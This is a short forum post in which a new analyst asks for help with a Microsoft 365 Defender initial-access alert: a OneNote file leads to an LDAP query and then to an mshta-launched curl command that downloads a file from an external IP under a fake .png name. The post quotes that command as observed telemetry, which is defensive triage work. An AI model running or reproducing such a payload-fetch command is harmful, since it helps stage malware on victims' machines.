Newbie looking for help and pointers

I am fairly new in my career and definitely new to MS 365 Defender. I'd ask my senior but he is off today. Ran into a situation in which a user/system triggered an alert regarding initial access.

Situation, alert in MS365 defender:
1- user opens a onenote notebook
2- onenote.exe performs suspicius LDAP query
3- curl commands attempts execution via mshta.exe ("curl.exe" --output C:\\ProgramData\\aliMhW.png --url http:// IP of CSP/15581.dat)
4- mshta.exe was audited by the attack surface reduction (ASR) rule …

access alert applications asr attack attack surface block career child cybersecurity defender initial access ldap notebook office onenote processes query system